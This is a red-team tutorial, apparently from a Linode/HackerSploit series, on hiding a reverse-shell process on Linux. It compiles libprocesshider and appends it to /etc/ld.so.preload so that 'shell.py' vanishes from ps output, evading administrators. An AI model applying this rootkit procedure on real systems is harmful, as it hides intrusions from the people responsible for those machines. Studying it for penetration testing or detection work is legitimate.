Linux Defense Evasion - Hiding Linux Processes

Traducciones al Español
Estamos traduciendo nuestros guías y tutoriales al Español. Es posible que usted esté viendo una traducción generada automáticamente. Estamos trabajando con traductores profesionales para verificar las traducciones de nuestro sitio web. Este proyecto es un trabajo en curso.
Create a Linode account to try this guide with a $ credit.
This credit will be applied to any valid services used during your first  days.

HackerSploit Red Team Series

This guide is part of the HackerSploit Red Team series of guides. To navigate to other guides in the series, visit the series’ parent page.

Important
All labs and tests are to be conducted within the parameters outlined within the text. The use of other domains or IP addresses is prohibited.

Before You Begin

In order to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions:

  • Kali Linux

  • Parrot OS

The following is a list of recommended technical prerequisites that you will need in order to get the most out of this course:

  • Familiarity with Linux system administration.

  • Familiarity with Windows.

  • Functional knowledge of TCP/IP.

  • Familiarity with penetration testing concepts and life-cycle.

Note: The techniques and tools utilized in this document were performed on Kali Linux 2021.2 Virtual Machine

MITRE ATT&CK Defense Evasion Techniques

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

MITRE ATT&CK defense evasion techniques

The techniques outlined under the Defense Evasion tactic provide us with a clear and methodical way of evading detection on a target system.

The following is a list of key techniques and sub techniques that we will be exploring:

  • Rootkits

Scenario

Our objective is to hide our reverse shell connection process on the target Linux system in order to avoid detection.

Hiding Linux Processes With Libprocesshider

We can leverage Rootkits on Linux systems to hide our processes from the process tree in order to avoid detection by system administrators or security analysts.

This can be very helpful during red team engagements on Linux targets, primarily because suspicious processes can be easily identified in the process tree and consequently terminated by the blue team or security analysts.

We can accomplish this through the use of various Linux rootkits, however, we also want to avoid setting up any advanced Rootkits that can be detected by Linux rootkit checkers or AV scanners.

For this reason, we will be utilizing an open-source Linux utility called Libprocesshider that will allow us to hide a process on a Linux target by leveraging the ld preloader.

GitHub Repository: https://github.com/gianlucaborello/libprocesshider

  1. The first step in the process will involve cloning the Libprocesshider GitHub repository onto the target system. This can be done by running the following command:

     git clone https://github.com/gianlucaborello/libprocesshider.git
    
  2. After cloning the repository you will need to determine the name of the process you would like to hide with Libprocesshider, this can be done by listing out the running processes on the system:

     ps aux
    

    In this case, I will be hiding the “shell.py” process as highlighted in the following screenshot.

  3. In order to hide the “shell.py” process from the process tree, we will need to navigate to the Libprocesshider directory we just cloned and modify the “processhider.c” file. This can be done by running the following command:

     vim processhider.c
    
  4. You will then need to modify the process_to_filter value to the name of the process you would like to hide as shown in the screenshot below.

    processhider.c file contents

    In this case, I will be hiding any occurrences of the “shell.py” process from the process tree. After making the change, you can save the file.

  5. The next step will involve compiling the “processhider.c” file in to a shared object file, this can be done by running the following command:

     make
    
  6. The compilation will produce a shared object file called “libprocesshider.so” as shown in the following screenshot.

  7. We will need to transfer this shared object file into the /usr/local/lib directory, this can be done by running the following command:

     mv libprocesshider.so /usr/local/lib
    
  8. We will then need to load the “libprocesshider.so” shared object with the global dynamic linker, this can be done by running the following command:

     echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
    
  9. We can now confirm that the “shell.py” process is hidden from the process tree by executing the script and listing out the running processes:

     ./shell.py
     ps aux
    

    As shown in the preceding screenshot the active “shell.py” process is not displayed in the process tree and will therefore evade any detection by administrators or system analysts.

This page was originally published on


Your Feedback Is Important

Let us know if this guide was helpful to you.


Join the conversation.
Read other comments or post your own below. Comments must be respectful, constructive, and relevant to the topic of the guide. Do not post external links or advertisements. Before posting, consider if your comment would be better addressed by contacting our Support team or asking on our Community Site.
The Disqus commenting system for Linode Docs requires the acceptance of Functional Cookies, which allow us to analyze site usage so we can measure and improve performance. To view and create comments for this article, please update your Cookie Preferences on this website and refresh this web page. Please note: You must have JavaScript enabled in your browser.